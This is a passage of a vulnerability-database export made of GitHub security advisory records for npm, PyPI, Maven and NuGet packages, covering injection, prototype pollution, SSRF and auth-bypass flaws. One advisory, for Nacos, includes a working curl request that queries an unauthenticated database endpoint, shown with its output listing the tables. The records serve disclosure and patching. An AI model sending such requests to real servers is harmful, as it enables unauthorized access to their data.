'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-30185'}, {'type': 'WEB', 'url': 'https://github.com/indico/indico/releases/tag/v2.3.4'}, {'type': 'WEB', 'url': 'https://www.shorebreaksecurity.com/blog/'}]","{'cwe_ids': ['CWE-640'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-08T16:33:24Z', 'nvd_published_at': '2021-04-07T14:15:00Z'}" +1.4.0,GHSA-4jj4-m52p-8rx3,2021-04-07T22:31:58Z,2021-04-13T15:24:08Z,,['CVE-2020-28281'],Prototype pollution in set-object-value,Prototype pollution vulnerability in 'set-object-value' versions 0.0.0 through 0.0.5 allows an attacker to cause a denial of service and may lead to remote code execution.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'set-object-value'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.0.6'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-28281'}, {'type': 'WEB', 'url': 'https://github.com/react-atomic/react-atomic-organism/blob/e5645a2f9e632ffdebc83d720498831e09754c22/packages/lib/set-object-value/src/index.js#L16'}, {'type': 'WEB', 'url': 'https://www.whitesourcesoftware.com/vulnerability-database/CVE-2020-28281'}]","{'cwe_ids': ['CWE-1321'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-04-07T22:31:58Z', 'nvd_published_at': '2020-12-29T18:15:00Z'}" +1.4.0,GHSA-7mx5-x372-xh87,2021-04-08T20:26:23Z,2021-04-20T16:40:27Z,,['CVE-2020-17526'],Incorrect Session Validation in Apache Airflow,"Incorrect Session Validation in Apache Airflow Webserver versions prior to 1.10.14 with default config allows a malicious airflow user on site A where they log in normally, to access unauthorized Airflow Webserver on Site B through the session from Site A. This does not affect users who have changed the default value for `[webserver] secret_key` config.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'apache-airflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.10.14'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-17526'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r466759f377651f0a690475d5a52564d0e786e82c08d5a5730a4f8352@%3Cannounce.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rbeeb73a6c741f2f9200d83b9c2220610da314810c4e8c9cf881d47ef%40%3Cusers.airflow.apache.org%3E'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2020/12/21/1'}]","{'cwe_ids': ['CWE-269'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-08T20:26:23Z', 'nvd_published_at': '2020-12-21T17:15:00Z'}" +1.4.0,GHSA-jff2-qjw8-5476,2021-04-29T17:22:56Z,2021-04-06T17:30:14Z,,['CVE-2021-21388'],Command Injection Vulnerability in systeminformation,"### Impact +command injection vulnerability + +### Patches +Problem was fixed with a parameter check. Please upgrade to version >= 5.6.4 + +### Workarounds +If you cannot upgrade, be sure to check or sanitize service parameters that are passed to si.inetLatency(), si.inetChecksite(), si.services(), si.processLoad() ... do only allow strings, reject any arrays. String sanitation works as expected.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'systeminformation'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.6.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/sebhildebrandt/systeminformation/security/advisories/GHSA-jff2-qjw8-5476'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21388'}, {'type': 'WEB', 'url': 'https://github.com/sebhildebrandt/systeminformation/commit/01ef56cd5824ed6da1c11b37013a027fdef67524'}, {'type': 'WEB', 'url': 'https://github.com/sebhildebrandt/systeminformation/commit/0be6fcd575c05687d1076d5cd6d75af2ebae5a46'}, {'type': 'WEB', 'url': 'https://github.com/sebhildebrandt/systeminformation/commit/7922366d707de7f20995fc8e30ac3153636bf35f'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/systeminformation'}]","{'cwe_ids': ['CWE-77', 'CWE-78'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-02T20:19:25Z', 'nvd_published_at': '2021-04-29T18:15:00Z'}" +1.4.0,GHSA-x7wf-5mjc-6x76,2021-04-07T19:31:51Z,2021-04-07T21:13:44Z,,['CVE-2020-28735'],SSRF attacks via tracebacks in Plone,Plone before 5.2.3 allows SSRF attacks via the tracebacks feature (only available to the Manager role).,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'Plone'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'plone.app.event'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.2.10'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'plone.app.theming'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.1.6'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'plone.app.dexterity'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.6.8'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'plone.supermodel'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.6.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-28735'}, {'type': 'WEB', 'url': 'https://github.com/plone/Products.CMFPlone/issues/3209'}, {'type': 'WEB', 'url': 'https://dist.plone.org/release/5.2.3/RELEASE-NOTES.txt'}]","{'cwe_ids': ['CWE-918'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-07T19:31:51Z', 'nvd_published_at': '2020-12-30T19:15:00Z'}" +1.4.0,GHSA-6rv4-4qv6-88g2,2021-04-12T17:39:01Z,2021-04-12T17:39:19Z,,['CVE-2021-25913'],Prototype Pollution in set-or-get,Prototype pollution vulnerability in ‘set-or-get’ version 1.0.0 through 1.2.10 allows an attacker to cause a denial of service and may lead to remote code execution.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'set-or-get'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0.0'}, {'fixed': '1.2.11'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-25913'}, {'type': 'WEB', 'url': 'https://github.com/IonicaBizau/set-or-get.js/commit/82ede5cccb2e8d13e4f62599203a4389f6d8e936'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/set-or-get'}, {'type': 'WEB', 'url': 'https://www.whitesourcesoftware.com/vulnerability-database/CVE-2021-25913'}]","{'cwe_ids': ['CWE-1321'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-04-12T17:38:22Z', 'nvd_published_at': '2021-02-08T22:15:00Z'}" +1.4.0,GHSA-4gfq-6m28-m5mg,2021-03-19T23:11:49Z,2021-04-13T15:16:11Z,,['CVE-2020-7775'],Improper neutralization of arguments in freediskspace,This affects all versions of package freediskspace. The vulnerability arises out of improper neutralization of arguments in line 71 of freediskspace.js.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'freediskspace'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.2.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7775'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-FREEDISKSPACE-1040716'}]","{'cwe_ids': ['CWE-78'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-03-19T23:11:49Z', 'nvd_published_at': '2021-02-02T19:15:00Z'}" +1.4.0,GHSA-cq8r-fc3q-6hg2,2021-04-06T20:51:59Z,2021-04-13T15:29:40Z,,['CVE-2020-28479'],Denial of Service (DoS) via the unsetByPath function in jsjoints,The package jointjs before 3.3.0 are vulnerable to Denial of Service (DoS) via the unsetByPath function.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'jointjs'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.3.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-28479'}, {'type': 'WEB', 'url': 'https://github.com/clientIO/joint/commit/ec7ab01b512a3c06a9944a25d50f255bf07c3499'}, {'type': 'WEB', 'url': 'https://github.com/clientIO/joint/releases/tag/v3.3.0'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWER-1062040'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1062039'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-JOINTJS-1062038'}]","{'cwe_ids': ['CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-06T20:51:59Z', 'nvd_published_at': '2021-01-19T15:15:00Z'}" +1.4.0,GHSA-j32x-j8pj-pg2h,2021-03-22T22:36:42Z,2021-04-13T15:20:34Z,,['CVE-2020-28450'],Prototype Pollution in decal,This affects all versions of package decal. The vulnerability is in the extend function.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'decal'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.1.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-28450'}, {'type': 'WEB', 'url': 'https://github.com/gigafied/decal.js/blob/master/src/utils/extend.js#L23-L56'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-DECAL-1051028'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/decal'}]","{'cwe_ids': ['CWE-1321', 'CWE-400', 'CWE-94'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-22T22:36:42Z', 'nvd_published_at': '2021-02-04T15:15:00Z'}" +1.4.0,GHSA-p62g-jhg6-v3rq,2023-08-31T20:32:30Z,2021-04-07T20:37:06Z,,['CVE-2020-10684'],"Code Injection, Race Condition, and Execution with Unnecessary Privileges in Ansible","A flaw was found in Ansible Engine, all versions 2.7.x, 2.8.x and 2.9.x prior to 2.7.17, 2.8.9 and 2.9.6 respectively, when using ansible_facts as a subkey of itself and promoting it to a variable when inject is enabled, overwriting the ansible_facts after the clean. An attacker could take advantage of this by altering the ansible_facts, such as ansible_hosts, users and any other key data which would lead into privilege escalation or code injection.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'ansible'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.7.0'}, {'fixed': '2.7.17'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'ansible'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.8.0'}, {'fixed': '2.8.9'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'ansible'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.9.0'}, {'fixed': '2.9.6'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-10684'}, {'type': 'WEB', 'url': 'https://github.com/ansible/ansible/commit/a9d2ceafe429171c0e2ad007058b88bae57c74ce'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-10684'}, {'type': 'PACKAGE', 'url': 'https://github.com/ansible/ansible'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DKPA4KC3OJSUFASUYMG66HKJE7ADNGFW/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MRRYUU5ZBLPBXCYG6CFP35D64NP2UB2S/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WQVOQD4VAIXXTVQAJKTN7NUGTJFE2PCB/'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/202006-11'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2021/dsa-4950'}]","{'cwe_ids': ['CWE-250', 'CWE-362', 'CWE-862', 'CWE-94'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-05T14:46:48Z', 'nvd_published_at': '2020-03-24T14:15:00Z'}" +1.4.0,GHSA-crh4-294p-vcfq,2021-10-08T21:22:01Z,2021-04-19T14:53:20Z,,[],Regular expression denial of service (ReDoS) in EmailField component in Vaadin 14 and 15-17,"Unsafe validation RegEx in `EmailField` component in `com.vaadin:vaadin-text-field-flow` versions 2.0.4 through 2.3.2 (Vaadin 14.0.6 through 14.4.3), and 3.0.0 through 4.0.2 (Vaadin 15.0.0 through 17.0.10) allows attackers to cause uncontrolled resource consumption by submitting malicious email addresses. + +- https://vaadin.com/security/cve-2021-31405","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.vaadin:vaadin-text-field-flow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.4'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'com.vaadin:vaadin-text-field-flow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0'}, {'fixed': '4.0.3'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/vaadin/flow-components/security/advisories/GHSA-crh4-294p-vcfq'}, {'type': 'PACKAGE', 'url': 'https://github.com/vaadin/flow-components'}, {'type': 'WEB', 'url': 'https://vaadin.com/security/cve-2021-31405'}]","{'cwe_ids': ['CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-16T23:12:10Z', 'nvd_published_at': None}" +1.4.0,GHSA-4hv7-3q38-97m8,2021-04-06T23:35:22Z,2021-04-13T15:24:47Z,,['CVE-2020-28464'],Arbitrary code execution in djv,"This affects the package djv before 2.1.4. By controlling the schema file, an attacker can run arbitrary JavaScript code on the victim machine.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'djv'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-28464'}, {'type': 'WEB', 'url': 'https://github.com/korzio/djv/pull/98/files'}, {'type': 'WEB', 'url': 'https://github.com/korzio/djv/blob/master/lib/utils/properties.js%23L55'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-DJV-1014545'}]","{'cwe_ids': ['CWE-94'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-04-06T23:35:22Z', 'nvd_published_at': '2021-01-04T12:15:00Z'}" +1.4.0,GHSA-xmxh-g7wj-8m4m,2021-04-13T15:32:15Z,2021-04-13T15:32:26Z,,['CVE-2019-10789'],OS Command Injection in curling,npm package `curling` before version 1.1.0 is vulnerable to Command Injection via the run function. The command argument can be controlled by users without any sanitization.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'curling'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.1.0'}]}], 'database_specific': {'last_known_affected_version_range': '<= 1.0.0'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-10789'}, {'type': 'WEB', 'url': 'https://github.com/hgarcia/curling/blob/e861d625c074679a2931bcf4ce8da0afa8162c53/lib/curl-transport.js#L56'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-CURLING-546484'}]","{'cwe_ids': ['CWE-78'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-31T23:13:03Z', 'nvd_published_at': '2020-02-06T16:15:00Z'}" +1.4.0,GHSA-7cj4-gj8m-m2f7,2021-08-31T21:06:39Z,2021-04-22T16:13:23Z,,['CVE-2020-17510'],Authentication bypass in Apache Shiro,"Apache Shiro before 1.7.0, when using Apache Shiro with Spring, a specially crafted HTTP request may cause an authentication bypass.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.shiro:shiro-spring'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.7.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-17510'}, {'type': 'WEB', 'url': 'https://github.com/apache/shiro/commit/dc194fc977ab6cfbf3c1ecb085e2bac5db14af6d'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/shiro'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r575301804bfac87a064359cf4b4ae9d514f2d10db7d44120765f4129@%3Cdev.shiro.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r70098e336d02047ce4d4e69293fe8d558cd68cde06f6430398959bc4@%3Cdev.shiro.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r70b907ccb306e9391145e2b10f56cc6914a245f91720a17a486c020a@%3Cdev.shiro.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r852971e28f54cafa7d325bd7033115c67d613b112a2a1076817390ac@%3Cdev.shiro.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r95bdf3703858b5f958b5e190d747421771b430d97095880db91980d6@%3Cannounce.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r9d93dfb5df016b1a71a808486bc8f9fbafebbdbc8533625f91253f1d@%3Cdev.shiro.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb47d88af224e396ee34ffb88ee99fb6d04510de5722cf14b7137e6bc@%3Cdev.shiro.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rc2cff2538b683d480426393eecf1ce8dd80e052fbef49303b4f47171%40%3Cdev.shiro.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/re25b8317b00a50272a7252c4552cf1a81a97984cc2111ef7728e48e0@%3Cdev.shiro.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/08/msg00002.html'}]","{'cwe_ids': ['CWE-287'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-04-21T21:21:47Z', 'nvd_published_at': '2020-11-05T21:15:00Z'}" +1.4.0,GHSA-934w-hvj4-7fr6,2021-08-02T15:38:02Z,2021-04-13T15:25:15Z,,['CVE-2020-7762'],Path Traversal in jsreport-chrome-pdf,This affects the package jsreport-chrome-pdf before 1.10.0.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'jsreport-chrome-pdf'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.10.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7762'}, {'type': 'WEB', 'url': 'https://github.com/jsreport/jsreport-chrome-pdf/commit/6750b2f77d05cb843aefc1c4a98097a3bd33a6a2'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-JSREPORTCHROMEPDF-1037310'}]","{'cwe_ids': ['CWE-22'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-06T22:36:49Z', 'nvd_published_at': '2020-11-05T13:15:00Z'}" +1.4.0,GHSA-ghhp-997w-qr28,2021-04-21T19:37:39Z,2021-04-21T19:38:01Z,,['CVE-2021-26701'],.NET Core Remote Code Execution Vulnerability,".NET Core Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-24112. + +### Executive summary + +Microsoft is releasing this security advisory to provide information about a vulnerability in .NET 5.0, .NET Core 3.1, and .NET Core 2.1. This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability. + +A remote code execution vulnerability exists in .NET 5 and .NET Core due to how text encoding is performed. + +### Discussion + +Discussion for this issue can be found at dotnet/runtime#49377 + +### Mitigation factors + +Microsoft has not identified any mitigating factors for this vulnerability. + +### Affected software + +The vulnerable package is `System.Text.Encodings.Web` . Upgrading your package and redeploying your app should be sufficient to address this vulnerability. + +Vulnerable package versions: + +Any .NET 5, .NET Core, or .NET Framework based application that uses the System.Text.Encodings.Web package with a vulnerable version listed below. + +Package Name | Vulnerable Versions | Secure Versions +-|-|- +System.Text.Encodings.Web | 4.0.0 - 4.5.0 | 4.5.1 +System.Text.Encodings.Web | 4.6.0-4.7.1 | 4.7.2 +System.Text.Encodings.Web | 5.0.0 | 5.0.1 + + +Please validate that each of the .NET versions you are using is in support. Security updates are only provided for supported .NET versions. + +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'System.Text.Encodings.Web'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0'}, {'fixed': '4.5.1'}]}]}, {'package': {'ecosystem': 'NuGet', 'name': 'System.Text.Encodings.Web'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.6.0'}, {'fixed': '4.7.2'}]}]}, {'package': {'ecosystem': 'NuGet', 'name': 'System.Text.Encodings.Web'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.0.0'}, {'fixed': '5.0.1'}]}], 'versions': ['5.0.0']}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-26701'}, {'type': 'WEB', 'url': 'https://github.com/dotnet/announcements/issues/178'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/S2AZOUKMCHT2WBHR7MYDTYXWOBHZW5P5/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TW3ZSJTTMZAFKGW7NJWTVVFZUYYU2SJZ/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UBOSSX7U6BSHV5RI74FCOW4ITJ5RRJR5/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WA5WQJVHUL5C4XMJTLY3C67R4WP35EF4/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XPUKFHIGP5YNJRRFWKDJ2XRS4WTFJNNK/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YLFATXASXW4OV2ZBSRP4G55HJH73QPBP/'}, {'type': 'WEB', 'url': 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26701'}]","{'cwe_ids': [], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-04-21T19:37:39Z', 'nvd_published_at': '2021-02-25T23:15:00Z'}" +1.4.0,GHSA-xv5h-v7jh-p2qh,2021-05-10T15:11:26Z,2021-04-27T20:09:25Z,,['CVE-2021-29442'],Authentication bypass for specific endpoint,"The [`ConfigOpsController`](https://github.com/alibaba/nacos/blob/57459227863485d064ff25b3d5e24e714dcf218f/config/src/main/java/com/alibaba/nacos/config/server/controller/ConfigOpsController.java) lets the user perform management operations like querying the database or even wiping it out. While the [`/data/remove`](https://github.com/alibaba/nacos/blob/57459227863485d064ff25b3d5e24e714dcf218f/config/src/main/java/com/alibaba/nacos/config/server/controller/ConfigOpsController.java#L133-L135) endpoint is properly protected with the `@Secured` annotation, the [`/derby`](https://github.com/alibaba/nacos/blob/57459227863485d064ff25b3d5e24e714dcf218f/config/src/main/java/com/alibaba/nacos/config/server/controller/ConfigOpsController.java#L99-L100) endpoint is not protected and can be openly accessed by unauthenticated users. + +For example, the following request will list the tables of the database: +``` +❯ curl -X GET 'http://console.nacos.io/nacos/v1/cs/ops/derby?sql=select+st.tablename+from+sys.systables+st' +{""code"":200,""message"":null,""data"":[{""TABLENAME"":""APP_CONFIGDATA_RELATION_PUBS""},{""TABLENAME"":""APP_CONFIGDATA_RELATION_SUBS""},{""TABLENAME"":""APP_LIST""},{""TABLENAME"":""CONFIG_INFO""},{""TABLENAME"":""CONFIG_INFO_AGGR""},{""TABLENAME"":""CONFIG_INFO_BETA""},{""TABLENAME"":""CONFIG_INFO_TAG""},{""TABLENAME"":""CONFIG_TAGS_RELATION""},{""TABLENAME"":""GROUP_CAPACITY""},{""TABLENAME"":""HIS_CONFIG_INFO""},{""TABLENAME"":""PERMISSIONS""},{""TABLENAME"":""ROLES""},{""TABLENAME"":""SYSALIASES""},{""TABLENAME"":""SYSCHECKS""},{""TABLENAME"":""SYSCOLPERMS""},{""TABLENAME"":""SYSCOLUMNS""},{""TABLENAME"":""SYSCONGLOMERATES""},{""TABLENAME"":""SYSCONSTRAINTS""},{""TABLENAME"":""SYSDEPENDS""},{""TABLENAME"":""SYSDUMMY1""},{""TABLENAME"":""SYSFILES""},{""TABLENAME"":""SYSFOREIGNKEYS""},{""TABLENAME"":""SYSKEYS""},{""TABLENAME"":""SYSPERMS""},{""TABLENAME"":""SYSROLES""},{""TABLENAME"":""SYSROUTINEPERMS""},{""TABLENAME"":""SYSSCHEMAS""},{""TABLENAME"":""SYSSEQUENCES""},{""TABLENAME"":""SYSSTATEMENTS""},{""TABLENAME"":""SYSSTATISTICS""},{""TABLENAME"":""SYSTABLEPERMS""},{""TABLENAME"":""SYSTABLES""},{""TABLENAME"":""SYSTRIGGERS""},{""TABLENAME"":""SYSUSERS""},{""TABLENAME"":""SYSVIEWS""},{""TABLENAME"":""TENANT_CAPACITY""},{""TABLENAME"":""TENANT_INFO""},{""TABLENAME"":""USERS""}]}% +``` + +These endpoints are only valid when using embedded storage (derby DB) so this issue should not affect those installations using external storage (e.g. mysql)",[],"[{'package': {'ecosystem': 'Maven', 'name': 'com.alibaba.nacos:nacos-common'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.4.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29442'}, {'type': 'WEB', 'url': 'https://github.com/alibaba/nacos/issues/4463'}, {'type': 'WEB', 'url': 'https://github.com/alibaba/nacos/pull/4517'}, {'type': 'ADVISORY', 'url': 'https://github.com/advisories/GHSA-36hp-jr8h-556f'}]","{'cwe_ids': ['CWE-306'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-27T20:08:49Z', 'nvd_published_at': '2021-04-27T21:15:00Z'}" +1.4.0,GHSA-rv39-3qh7-9v7w,2022-02-08T22:03:58Z,2021-04-30T17:29:51Z,,['CVE-2020-5421'],Improper Input Validation in Spring Framework,"In Spring Framework versions 5.2.0 - 5.2.8, 5.1.0 - 5.1.17, 5.0.0 - 5.0.18, 4.3.0 - 4.3.28, and older unsupported versions, the protections against RFD attacks from CVE-2015-5211 may be bypassed depending on the browser used through the use of a jsessionid path parameter.","[{'type': 'CVSS_V3', 'score': 